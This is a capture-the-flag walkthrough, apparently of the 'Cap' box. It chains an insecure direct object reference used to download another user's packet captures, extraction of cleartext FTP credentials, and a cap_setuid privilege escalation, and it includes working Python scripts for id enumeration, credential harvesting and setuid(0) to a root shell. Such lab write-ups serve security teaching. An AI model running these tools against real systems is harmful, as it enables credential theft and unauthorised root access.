Cap
Last updated
Looks like a data analytics page that I am currently signed into as Nathan.
The dropdown menu under the user doesn't do anything. None of the buttons, including Logout, point anywhere or do anything.
Take a look at the source code:
There is a lot there but it looks like we have some new information:
We have a user named Nathan, and possibly other users: Rashed, Kaji Patha, and Ratul Hamba.
Checking the Server header with curl doesn't give us the version number of the gunicorn web server.
If we go to the home tab in the upper right and click on Network Status, we get some really good info about the machine without having to run an nmap scan: ports 21, 22, and 80 are open.
When I try something in the search bar, nothing pops up but a parameter is added to the URL.
I captured a packet with Burp Suite and received the following.
Let's try the Security Snapshot button. This appears to capture packets for a 5 second period and produce a pcap file to look at.
We can also see that the URL contains a data parameter: after the first snapshot it equals 1, and it goes up by one with each new capture. If the id is just a sequential integer and the server never checks who created each capture (an insecure direct object reference), setting it to 0 should show us a capture we didn't make. Let's try that and see what it spits out. We'll also grab the pcap file from it.
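Rather than changing the id by hand, the whole range can be walked. The block below is an added example, not code from the original write-up: it assumes the snapshot page lives at /data/<id> and the capture at /download/<id> (assumed routes), and that the id is a sequential integer the server does not tie to the logged-in user. The stand-in server at the bottom is constructed so the script runs offline; against the live box, drop the fetch argument.

```python
"""Enumerate Security Snapshot ids and download each capture.

Added example, not code from the original write-up. It assumes the
application serves the snapshot page at /data/<id> and the pcap at
/download/<id> (assumed routes), and that <id> is a plain sequential
integer that the server never ties to the requesting user, which is
the insecure direct object reference described above.
"""
import os
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional

Fetcher = Callable[[str], Optional[bytes]]

# Magic numbers for libpcap (both byte orders, plus nanosecond variants) and pcapng.
PCAP_MAGICS = (
    b"\xd4\xc3\xb2\xa1", b"\xa1\xb2\xc3\xd4",
    b"\x4d\x3c\xb2\xa1", b"\xa1\xb2\x3c\x4d",
    b"\x0a\x0d\x0d\x0a",
)


def http_fetch(url: str) -> Optional[bytes]:
    """Live fetcher: GET the URL and return the body, or None on an HTTP error (e.g. 404)."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read()
    except urllib.error.HTTPError:
        return None


def looks_like_capture(body: bytes) -> bool:
    """Cheap sanity check so an HTML error page is not saved as a .pcap."""
    return body[:4] in PCAP_MAGICS


def enumerate_snapshots(base_url: str, start: int, stop: int,
                        fetch: Fetcher = http_fetch) -> Dict[int, bytes]:
    """Walk ids start..stop-1; return {id: pcap bytes} for every capture the server hands back."""
    found: Dict[int, bytes] = {}
    for cid in range(start, stop):
        if fetch(f"{base_url}/data/{cid}") is None:
            continue  # no such snapshot
        body = fetch(f"{base_url}/download/{cid}")
        if body and looks_like_capture(body):
            found[cid] = body
    return found


def save_captures(found: Dict[int, bytes], outdir: str) -> None:
    """Write each capture to <outdir>/<id>.pcap for Wireshark."""
    os.makedirs(outdir, exist_ok=True)
    for cid, body in found.items():
        with open(os.path.join(outdir, f"{cid}.pcap"), "wb") as fh:
            fh.write(body)


# Constructed stand-in for the target so the example runs offline:
# snapshots 0 and 1 exist (0 belongs to someone else), everything above 404s.
_DEMO_PCAP = b"\xd4\xc3\xb2\xa1" + b"\x02\x00\x04\x00" + b"\x00" * 16
_DEMO_ROUTES = {
    "/data/0": b"<html>snapshot 0</html>", "/download/0": _DEMO_PCAP,
    "/data/1": b"<html>snapshot 1</html>", "/download/1": _DEMO_PCAP,
}


def demo_fetch(url: str) -> Optional[bytes]:
    """Fake server: look the path up in the constructed route table."""
    path = url.split("://", 1)[-1].split("/", 1)[1]
    return _DEMO_ROUTES.get("/" + path)


if __name__ == "__main__":
    # Against the live box, omit fetch=demo_fetch so http_fetch is used.
    captures = enumerate_snapshots("http://target", 0, 10, fetch=demo_fetch)
    print("accessible snapshot ids:", sorted(captures))
```

Starting the walk at 0 rather than at our own first id is the whole point: the captures that predate our session are the ones we were never meant to see.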
We can open this pcap file in Wireshark to take a look at it and see if we can find any good information.
Scanning through the Wireshark capture, we quickly find FTP credentials for the user Nathan. FTP sends the USER and PASS commands in cleartext, so anyone holding a capture of the login can read them straight off the wire.
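The same credentials can be pulled out of the capture without opening Wireshark at all. The block below is an added example, not code from the original write-up: it parses a classic libpcap file with Ethernet framing, reassembles the client-to-server side of each TCP flow to port 21 in arrival order (no sequence-number reordering), and reports every USER/PASS pair. The three-packet sample capture at the bottom is constructed here; its addresses and password are made up, only the username nathan comes from the page.

```python
"""Pull FTP logins out of a pcap without opening Wireshark.

Added example, not code from the original write-up. Classic libpcap
only (not pcapng), Ethernet link type, IPv4/TCP. Payloads of each
client->server flow to port 21 are concatenated in arrival order.
"""
import struct
from typing import Dict, Iterator, List, Optional, Tuple

Flow = Tuple[str, int, str, int]  # (src ip, src port, dst ip, dst port)


def iter_pcap_frames(data: bytes) -> Iterator[bytes]:
    """Yield raw link-layer frames from a classic libpcap file."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != 1:  # LINKTYPE_ETHERNET
        raise ValueError(f"unsupported link type {linktype}")
    off = 24  # skip the 24-byte global header
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame: bytes) -> Optional[Tuple[Flow, bytes]]:
    """Return ((src, sport, dst, dport), payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # EtherType IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:  # protocol field: TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return (src, sport, dst, dport), tcp[data_off:]


def extract_ftp_credentials(pcap: bytes, ftp_port: int = 21) -> List[Dict[str, str]]:
    """Collect USER/PASS pairs from every client->server FTP control flow."""
    flows: Dict[Flow, bytes] = {}
    for frame in iter_pcap_frames(pcap):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        flow, payload = parsed
        if flow[3] != ftp_port or not payload:
            continue  # server replies and empty ACKs are not needed
        flows[flow] = flows.get(flow, b"") + payload
    creds = []
    for (src, sport, dst, dport), buf in flows.items():
        user = password = None
        for line in buf.split(b"\r\n"):
            cmd, _, arg = line.partition(b" ")
            if cmd.upper() == b"USER":
                user = arg.decode(errors="replace")
            elif cmd.upper() == b"PASS":
                password = arg.decode(errors="replace")
        if user is not None and password is not None:
            creds.append({"client": f"{src}:{sport}", "server": f"{dst}:{dport}",
                          "user": user, "password": password})
    return creds


# --- constructed sample capture (addresses and password are made up) ---------
def _frame(payload: bytes, src: str, sport: int, dst: str, dport: int) -> bytes:
    def ip_bytes(addr: str) -> bytes:
        return bytes(int(o) for o in addr.split("."))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ip_bytes(src), ip_bytes(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip  # zeroed MACs, EtherType IPv4


def build_sample_pcap() -> bytes:
    """Three-packet FTP login: USER, the 331 reply, PASS."""
    client, server = "10.0.0.5", "10.0.0.20"
    frames = [
        _frame(b"USER nathan\r\n", client, 40001, server, 21),
        _frame(b"331 Please specify the password.\r\n", server, 21, client, 40001),
        _frame(b"PASS example-password-123\r\n", client, 40001, server, 21),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, fr in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(fr), len(fr)) + fr
    return out


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for c in extract_ftp_credentials(data):
        print(f"{c['client']} -> {c['server']}: {c['user']} / {c['password']}")
```

Run it as python3 ftpcreds.py 0.pcap against a downloaded capture; with no argument it processes the constructed sample.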
We can now log into nathan's FTP account, list the current working directory, and download the user flag. On our host system we can then read the text file for the first flag.
The backend language appears to be Python.
Utilizes Gunicorn as a web server.
The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.
None of this is new to me, and it doesn't provide any new information.
Now that we have credentials for nathan, we can spend some time exploring the target system for possible privilege escalation. I'm going to use the same credentials to log in through SSH.
Try sudo -l to check what sudo privileges we have. Unfortunately, we have none, so let's go digging around.
I spent some time digging around myself but didn't find anything, so I decided to upload a copy of LinPEAS to the target account and run some automated enumeration to help out.
I came across something interesting.
I can verify the capability with the following command. File capabilities let a binary run with a specific slice of root's privileges without being fully setuid root; in effect it is similar to SUID, just narrower.
This is great information, as having cap_setuid set on a binary is a particularly dangerous situation: whatever runs that binary can switch its user id to 0. HackTricks and GTFOBins both have sections on exploiting this for privilege escalation. Let's go with the privilege escalation from GTFOBins.
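The GTFOBins route boils down to calling setuid(0) from a process that holds cap_setuid and then spawning a shell. The block below is an added example, not code from the original write-up or from GTFOBins: it assumes the file carrying cap_setuid is a Python interpreter (the case the GTFOBins entry covers), decodes the process's own effective capability mask from /proc/self/status so you can confirm the bit is actually in effect before trying anything, and only then escalates. From a shell, getcap -r / 2>/dev/null is the usual way to find such files system-wide; this script is meant to be run with the capable interpreter itself.

```python
"""Check the running interpreter's effective capabilities and, if it holds
cap_setuid, take the GTFOBins route to root.

Added example, not code from the original write-up. Assumes the binary
carrying cap_setuid is the Python interpreter running this file, e.g.
/path/to/capable/python3 caps.py (assumed path).
"""
import os
import re
from typing import List

# Bit numbers from linux/capability.h; anything unlisted prints as cap_<n>.
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid",
    7: "cap_setuid", 8: "cap_setpcap", 12: "cap_net_admin",
    13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin",
    27: "cap_mknod", 31: "cap_setfcap",
}


def decode_caps(hexmask: str) -> List[str]:
    """Turn a CapEff/CapPrm hex mask into capability names, lowest bit first."""
    mask = int(hexmask, 16)
    return [CAP_NAMES.get(bit, f"cap_{bit}")
            for bit in range(mask.bit_length()) if (mask >> bit) & 1]


def effective_caps_from_status(status_text: str) -> List[str]:
    """Parse the CapEff line of a /proc/<pid>/status dump."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if m is None:
        raise ValueError("no CapEff line found")
    return decode_caps(m.group(1))


def current_effective_caps() -> List[str]:
    """Effective set of this very process (reflects +e file capabilities after exec)."""
    with open("/proc/self/status") as fh:
        return effective_caps_from_status(fh.read())


def escalate_if_possible() -> bool:
    """With cap_setuid in the effective set, setuid(0) succeeds for an
    unprivileged user and sets real, effective and saved uid to 0; then exec
    a shell. Returns False when the capability is absent (exec never returns
    when it works)."""
    if "cap_setuid" not in current_effective_caps():
        return False
    os.setuid(0)
    os.execv("/bin/sh", ["/bin/sh"])
    return True  # unreachable; exec replaced the process


if __name__ == "__main__":
    caps = current_effective_caps()
    print("effective capabilities:", ", ".join(caps) or "(none)")
    if not escalate_if_possible():
        print("cap_setuid not present in this interpreter; nothing to exploit here")
```

Running it with the stock system interpreter reports an empty set and exits cleanly; running it with the interpreter that carries cap_setuid+ep prints cap_setuid and drops you into a root shell.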
And now I have root privileges.
Let's go get the root flag.